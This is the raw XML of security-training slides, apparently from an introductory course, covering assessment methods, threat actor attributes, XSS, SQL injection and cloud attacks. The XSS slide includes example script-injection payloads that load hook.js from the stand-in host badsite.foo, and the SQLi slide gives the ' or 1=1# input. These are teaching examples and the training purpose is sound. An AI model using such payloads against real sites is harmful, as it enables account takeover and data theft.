                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Reviewing documentation, such as design specifications, architecture diagrams, security policies, and procedures, to ensure the system is implemented according to secure design principles and compliance requirements.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2706891272"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Source Code Analysis</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Analyzing source code to identify potential security</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-ID" sz="1600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>vulnerabilities or coding errors to uncover issues related to input validation, secure coding practices, and coding Standards.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1984222048"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Configuration Assessment</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Evaluating configuration settings to ensure they align with security best practices and industry standards, such as assessing access controls, encryption settings, authentication mechanisms, and other security-related configurations.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2506330065"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Cryptographic Analysis</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Assessing cryptographic mechanisms, including encryption algorithms, key management, and secure key storage, to ensure the proper implementation and use of cryptographic schemes according to industry standards and guidelines.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="666928694"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Compliance Verification</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Verifying compliance with standards specified by relevant regulations, frameworks, or security certifications.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3427530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Security Architecture Review</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Evaluating security architecture and design to identify potential weaknesses or gaps in security controls, such as insufficient segregation of duties, lack of audit trails, or inadequate access controls</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="626043100"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="734561598"/>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7C11C-194C-0DBB-3584-1F05B0420DE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Attributes of Threat Actors</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5AF2F22-1352-4E75-25F8-C9F5A5AA3E1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="698500" y="2011680"/>
            <a:ext cx="11049000" cy="4562144"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Internal/External</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Internal/external refers to the degree of access that a threat actor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>posseses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> before initiating an attack. An external threat actor has no account or authorized access to the target system. A malicious external threat must infiltrate the security system using unauthorized access, such as breaking into a building or hacking into a network. Note that an external actor may perpetrate an attack remotely or on-premises. It is the threat actor that is external rather than the attack method.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Conversely, an internal/insider threat actor has been granted permissions on the system. This typically means an employee, but insider threats can also arise from contractors and business partners.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Level of Sophistication/Capability</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Level of sophistication/capability refers to a threat actor’s ability to use advanced exploit techniques and tools. The least capable threat actor relies on commodity attack tools that are widely available. More capable actors can fashion new exploits in operating systems, applications software, and embedded control systems. At the highest level, a threat actor might use non-cyber tools such as political or military assets.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Resources/Funding</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>A high level of capability must be supported by resources/funding. Sophisticated threat actor groups need to be able to acquire resources, such as customized attack tools and skilled strategists, designers, coders, hackers, and social engineers. The most capable threat actor groups receive funding from nation-states and organized crime.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="249673957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91A56-E065-4F6D-3C52-3BB31942CF91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Web Application Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCAF1F19-57E0-FBAB-E75B-5DCC5B24A490}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web application attacks specifically target applications accessible over the Internet, exploiting vulnerabilities in these applications to gain unauthorized access, steal sensitive data, disrupt services, or perform other malicious activities. The defining characteristics of web application attacks often involve the exploitation of poor input validation (leading to attacks like SQL injection or cross-site scripting), misconfigured security settings, and outdated software with known vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23458934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86FF6-C0B0-625B-2BFF-E2ECECEAD4D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484311" y="1"/>
            <a:ext cx="10018713" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6E89485-BBD6-4C73-E379-CD6F759090C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484310" y="1066801"/>
            <a:ext cx="10018713" cy="5600699"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A cross-site scripting (XSS) attack exploits the fact that the browser is likely to trust scripts that appear to come from a site the user has chosen to visit. XSS inserts a malicious script that appears to be part of the trusted site. A nonpersistent type of XSS attack would proceed as follows:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker identifies an input validation vulnerability in the trusted site.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker crafts a URL to perform a code injection against the trusted site. This could be coded in a link from the attacker’s site to the trusted site or a link in an email message.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When the user clicks the link, the trusted site returns a page containing the malicious code injected by the attacker. As the browser is likely to be configured to allow the site to run scripts, the malicious code will execute.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, with no input sanitization, a threat actor could type the following into a new post text field:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Check out this amazing &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>="https://trusted. foo"&gt;website&lt;/a&gt;&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>="https://badsite.foo/ hook.js"&gt;&lt;/script&gt;.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Users viewing the post will have the malicious script hook.js execute in their browser.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An exploit against a client-side script could work as follows:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker identifies an input validation vulnerability in the trusted site. For example, a message board might take the user’s name from an input text box and show it in a header. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>https://trusted.foo/messages?user=james</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker crafts a URL to modify the parameters of a script that the server will return, such as the following:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>https://trusted.foo/messages? user=James%3Cscript%20src%3D%22https%3A%2F% 2Fbadsite.foo%2Fhook.js%22%3E%3C%2Fscript%3E</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The server returns a page with the legitimate DOM script embedded, but containing the parameter:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>James&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>="https://badsite.foo/hook. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>"&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The browser renders the page using the DOM script</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3170739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46787-A8C1-E88A-C1CE-DADAD5D94B48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>SQL Injection (SQLi)</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63EEB9C0-58C3-0EEB-3F3F-2A44B6FAFE37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484310" y="1943101"/>
            <a:ext cx="10018713" cy="4686300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A web application is likely to use Structured Query Language (SQL) to read and write information from a database. The main database operations are performed by SQL statements for selecting data (SELECT), inserting data (INSERT), deleting data (DELETE), and updating data (UPDATE). In a SQL injection attack, the threat actor modifies one or more of these four basic functions by adding code to some input accepted by the app, causing it to execute the attacker’s own set of SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>queries or parameters. If successful, this could allow the attacker to extract or insert information into the database or execute arbitrary code on the remote system using the same privileges as the database application (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>owasp.org/www-community/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>attacks/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" err="1"/>
              <a:t>SQL_Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, consider a web form that is supposed to take a name as input. If the user enters "Bob,” the application runs the following query:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>tbl_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> WHERE username = 'Bob'</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a threat actor enters the string ' or 1=1# and this input is not sanitized, the following malicious query will be executed:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>tbl_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> WHERE username = '' or 1=1#</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3592409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86E7D-4544-A0D8-A296-60D3FAB77371}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1484311" y="685801"/>
            <a:ext cx="10018713" cy="749300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cloud-Based Application Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
